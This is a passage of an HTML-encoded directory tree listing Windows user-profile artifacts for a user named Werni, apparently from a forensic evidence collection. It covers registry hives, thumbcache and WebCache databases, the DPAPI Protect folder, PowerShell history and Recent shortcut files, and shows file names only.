&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_1280.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_16.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_1920.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_2560.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_256.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_32.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_768.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_96.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_custom_stream.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_exif.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_idx.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_sr.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_wide_alternate.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; thumbcache_wide.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; History
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; UsrClass.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; UsrClass.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; UsrClass.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; WebCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; V0100009.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; V010000A.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; V01.chk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; V01.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; V01tmp.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; WebCacheV01.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; WebCacheV01.jfm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Packages
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft.MicrosoftEdge_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; LocalState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PinnedTiles
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 26310719480
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 38975140460
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 6501008900
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; 7603651830
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Roaming
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Internet Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Quick Launch
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft Edge.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Shows Desktop.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; User Pinned
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TaskBar
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; File Explorer.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft Edge.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Window Switcher.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Protect
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; S-1-5-21-3871582759-1638593395-315824688-500
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 275cad93-d3d0-4a44-bbb3-62366bf077e4
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 95bb4295-a4ff-4e6d-8252-6e78bbc17e45
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Preferred
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; PowerShell
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PSReadline
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; ConsoleHost_history.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; Recent
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AutomaticDestinations
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 5f7b5f1e01b83767.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 7e4dca80246863e3.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 9b9cdc69c1c24e2b.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; f01b4d95cf55d32a.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; f18460fded109990.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CustomDestinations
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 590aee7bdd69b59b.customDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 7e4dca80246863e3.customDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ccba5a5986c77e43.customDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; f01b4d95cf55d32a.customDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; f18460fded109990.customDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Desktop.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Device Manager.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Documents.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; id_rsa.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Modules.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; monitor.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ms-settingsnetwork.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OUTPUTS.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Quick access.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Target.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; This PC.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; todo.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Users.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Werni.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; Start Menu
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;                 &#9492;&#9472;&#9472; Programs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;                     &#9492;&#9472;&#9472; OneDrive.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Desktop
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Microsoft Edge.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NTUSER.DAT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ntuser.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ntuser.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Default
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NTUSER.DAT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NTUSER.DAT.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; NTUSER.DAT.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Werni
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AppData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Local
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Comms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Unistore
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; AggregateCache.uca
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UnistoreDB
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; store.jfm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; store.vol
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; USS.jcp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; USS.jtx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; USSres00001.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; USSres00002.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; USStmp.jtx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ConnectedDevicesPlatform
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CDPGlobalSettings.cdp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Connected Devices Platform certificates.sst
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; L.Werni
